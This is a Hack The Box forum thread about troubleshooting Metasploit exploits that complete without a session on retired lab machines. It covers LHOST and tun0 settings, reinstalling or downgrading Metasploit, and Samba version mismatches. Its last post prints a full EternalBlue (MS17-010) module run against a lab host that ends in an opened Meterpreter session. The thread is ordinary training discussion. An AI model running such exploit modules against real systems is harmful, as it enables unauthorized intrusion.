[SOLVED] Exploit completed, but no sessions created.

not sure if this was a spoiler so i’ve retracted the comment

I know this is already solved but I was stuck on this for some time and I think a little more detailed steps could help someone.

I was able to fix the same problem by downgrading to msf5 so if you’re on msf6, then try following what I did. The thing is that msf5 is more stable than msf6 and that’s why I recommend downgrading. I can give out some steps:

Uninstall metasploit 6. I did: sudo apt-get --auto-remove metasploit-framework (just type meta and press tab key to autocomplete)

I downloaded the msf5.tar.gz which can be found here: Release 5.0.101 · rapid7/metasploit-framework · GitHub
and extracted it with tar command: tar xvzf filename.tar.gz

go to home directory with cd ~
Then do: gem install bundle
The command above is be required to install the different gems(dependencies) which are required in metasploit

Then go back into the extracted folder and use this command to get all the gems for metasploit: bundle install
**Keep in mind you might have to do bundle install a few times later on so make sure you go into the metasploit extracted folder before you do bundle install

These gems are the dependencies that OP was talking about and how he fixed his issue. Now here’s the kicker, when you try to do bundle install, it will say some error. Try reading through that error line by line and it will give a command saying make sure something is installed before bundling.
Use that command inside the quotations that it says and then it will give you another error which will say something like check log file and it will give the path to that file.

‘cat’ the output of that log file that the error shares and you’ll see the error there. It will say something like this directory/file does not exist. Now just google that error and some stack overflow like websites should show up with the answer. The basic issue here is that those dependencies that you are installing for metasploit have their own dependencies and its a simple matter of using apt to install them (sudo apt-get install packagename). I had to install these dependencies and then do bundle install in the extracted folder. Then it would give another error and it carried on for a few more times. After a while when you do bundle install, it should say something like bundle is complete and it should not give any more errors.

You’re technically done (to run metasploit, just go in the extracted folder and do ./msfconsole) but here’s what you could do to make it a little bit easier to start metasploit.
I used an alias so you can access metasploit from anywhere instead having to type in the directory each time you want to use metasploit

to create an alias, I kept the command similar to the original which is msfconsole.

Just keep in mind if you keep msf6 installed or install it later, then this alias command might intervene so either don’t use msfconsole as the alias command or just replace the msfconsole before the = to something else like msfconsole5 or msf5console.

I used: alias msfconsole=‘cd “path to metasploit extracted folder”/ && ./msfconsole -q’
the -q runs metasploit faster.

I was stuck on this for a while and I hope this helps someone.

Type your comment> @Phantom95 said:

I know this is already solved but I was stuck on this for some time and I think a little more detailed steps could help someone.

I was able to fix the same problem by downgrading to msf5 so if you’re on msf6, then try following what I did. The thing is that msf5 is more stable than msf6 and that’s why I recommend downgrading. I can give out some steps:

Uninstall metasploit 6. I did: sudo apt-get --auto-remove metasploit-framework (just type meta and press tab key to autocomplete)

I downloaded the msf5.tar.gz which can be found here: Release 5.0.101 · rapid7/metasploit-framework · GitHub
and extracted it with tar command: tar xvzf filename.tar.gz

go to home directory with cd ~
Then do: gem install bundle
The command above is be required to install the different gems(dependencies) which are required in metasploit

Then go back into the extracted folder and use this command to get all the gems for metasploit: bundle install
**Keep in mind you might have to do bundle install a few times later on so make sure you go into the metasploit extracted folder before you do bundle install

These gems are the dependencies that OP was talking about and how he fixed his issue. Now here’s the kicker, when you try to do bundle install, it will say some error. Try reading through that error line by line and it will give a command saying make sure something is installed before bundling.
Use that command inside the quotations that it says and then it will give you another error which will say something like check log file and it will give the path to that file.

‘cat’ the output of that log file that the error shares and you’ll see the error there. It will say something like this directory/file does not exist. Now just google that error and some stack overflow like websites should show up with the answer. The basic issue here is that those dependencies that you are installing for metasploit have their own dependencies and its a simple matter of using apt to install them (sudo apt-get install packagename). I had to install these dependencies and then do bundle install in the extracted folder. Then it would give another error and it carried on for a few more times. After a while when you do bundle install, it should say something like bundle is complete and give no errors.

You’re technically done (to run metasploit, just go in the extracted folder and do ./msfconsole) but here’s what you could do to make it a little bit easier to start metasploit.
I used an alias so you can access metasploit from anywhere instead having to type in the directory each time you want to use metasploit

to create an alias, I kept the command similar to the original which is msfconsole.

Just keep in mind if you keep msf6 installed or install it later, then this alias command might intervene so either don’t use msfconsole as the alias command or just replace the msfconsole before the = to something else like msfconsole5 or msf5console.

I used: alias msfconsole=‘cd / && ./msfconsole -q’
the -q runs metasploit faster.

I was stuck on this for a while and I hope this helps someone.

Nice. I thought about doing this and may still downgrade. I found another way around my problem using a different problem but still a bit worried about the transition between python2/msf5 and python3/msf6 as someone new trying to follow tutorials

Type your comment> @fazersheen said:

Nice. I thought about doing this and may still downgrade. I found another way around my problem using a different problem but still a bit worried about the transition between python2/msf5 and python3/msf6 as someone new trying to follow tutorials

I’m kinda new too and it took me a while too but I’m happy I did it and I guess you learn only by doing it.

I’m a noob and using metasploit 5 and still get the error on Legacy. Any ideas?

Started reverse TCP handler on 192.168.0.40:4444
10.10.10.4:445 - Attempting to trigger the vulnerability…
Exploit completed, but no session was created.

Type your comment> @juanhk said:

show options

LHOST 192.xxx.x.xxx yes The local listener hostname

set LHOST (IP de openvpn, tun0 )

El problema es que te carga automaticamente la ip de eth0 y tendria que cargar la de tun0

This worked for me. Thanks.

Has anyone managed to get a resolution on this issue?
I have tried all solutions on this forum including reinstalling Metasploit, rolling back Metasploit to v5, disabling firewalls, trying each payload, running msfconsole as sudo.

All config under ‘show options’ is set correctly, RHOSTS as the Lame box and LHOST as the IP of my tun0 adapter.

If anybody could offer any advice or resolution I would be very grateful as I am very stuck and not sure what to try next!

This was driving me crazy for the past 2 hours. This is an easy box so my fragile ego is in shambles (boo hoo). Is there something wrong with this box or am I just doing it wrong?

I have tried the metasploit solution, and I have tried a script I found on the internet. I have tried using the pwnbox os that htb offers as well to do the metasploit solution. Metasploit on both give me the same no session created issue, and the script either isn’t working or cant make it back. Can anyone make me sane again? At this point I feel like someone patched it on me to pull a sick prank.

This is the name of the script, I assume this isn’t spoilers since there’s a writeup but it has the same name as metasploit exploit. You can find it on gitlab if you google search it.

! usermap_script.py by amriunix

whe running nmap -p 445 -A 10.10.10.3 im getting that the smb version is 3.0.28a instead of the 3.0.20 which is the one in the walkthroughs. Does this make any difference for the exploit?

@T0fu said:

whe running nmap -p 445 -A 10.10.10.3 im getting that the smb version is 3.0.28a instead of the 3.0.20 which is the one in the walkthroughs. Does this make any difference for the exploit?

I noticed the same thing. The documented exploit only works for version 3.0.20 < 3.0.25rc3 and the current version is 3.0.28a.

I’m still digging, but haven’t found a fix yet. I might try the fix fluffikinz recommends, but it would be nice to know if there was some kind of change in the box/challenge. Seems inconsistent to make such a drastic change after the box is retired and so many have already owned it - to require a completely different tactic.

In case someone else would encounter a problem here … Basically, I’d say that Metasploit, if not specified with LHOST, will use the default network card’s IP. The thing is, because we’re connected to the lab through a VPN, this makes Metasploit listen on the “wrong” interface in this context.

To fix this, you’ll have to change LHOST with the IP address you have on the HTB network (tun0)

set LHOST 10.10.1X.X

Hope it helps

Yes, Samba might be upgraded, but there are still other vulnerable services exposed.

Also I found its quite handy to set LHOST to tun0 and not to specific IP, as the IP changes between connections.

There are 2 things you need to do:

  • Update msf-framework. You will need to go into its /usr/share/metasploit-frame and “bundle install”. From there, your msf will have all updates and upgrade. There is a problem upgrading it in command line.
  • For LHOST, please try to figure out your IP address and set LHOST to that. Try to choose the right one by Google. You should be fine.

~~Not sure what I did different, but I just skipped this one for about a week and came back to it. Magically msf worked this time. ~~

However I did type in the wrong ip the first time running it, I’m going to chalk it up to either user error or something was wonky with the servers that got fixed. numbors R hard, make sure the connection handler in msf binds and if it doesnt check that your options are correct.

I was going through what I did step by step and realized:

! I used the OTHER samba port! I don’t know if maybe I refused to try that port for some odd reason but that was the issue. That seems like an issue I’d catch, but… seems that isn’t the case. Look at your scan, and try the other ports (if you dont know which one just try all of them, but nmap should give enough info to know which one). Feel dumb lol

Use your tun0 inet for the LHOST instead of your IP, because we are connecting through HTB VPN.

Still same issue

At the time of writing this, I was able to establish the connection using recommended command:

set LHOST tun0

Thanks for all continued recommendations.

Type your comment> @BasedJab said:

OK, so I finally found the fix.

I uninstalled metasploit ( sudo apt-get remove --auto-remove metasploit-framework ) and then re-installed the new build from their github repo. Installed it in my /opt folder and then installed all the dependencies (a bunch of ruby gems that will probably need some manual dpkg installs themselves) and now it works.

I guess the defualt Metasploit just didn’t work and upgrading it also didn’t.

This is what I ended up having to do as well. Except I re-installed using apt:

  1. sudo apt-get remove --auto-remove metasploit-framework
  2. sudo apt update && sudo apt install metasploit-framework -y

This didn’t help me with the manual exploits though; so there is still something in the 2020.4 kali instance that’s blocking stuff. For Legacy, the Win firewall kept getting enabled somehow, so many resets to figure it out.

set PROCESSINJECT lsass.exe this worked and exploit executed

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.10.40
rhost => 10.10.10.40
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.10.14.x
lhost => 10.10.14.16
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PROCESSINJECT lsass.exe
PROCESSINJECT => lsass.exe
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[
] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[
] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[
] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[
] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[
] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[] 10.10.10.40:445 - Sending final SMBv2 buffers.
[
] 10.10.10.40:445 - Sending last fragment of exploit packet!
[] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[
] 10.10.10.40:445 - Sending egg to corrupted connection.
[] 10.10.10.40:445 - Triggering free of corrupted buffer.
[
] Started bind TCP handler against 10.10.10.40:4444
[] Sending stage (200262 bytes) to 10.10.10.40
[
] Meterpreter session 1 opened (0.0.0.0:0 → 10.10.10.40:4444) at 2021-01-15 20:30:59 -0500
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=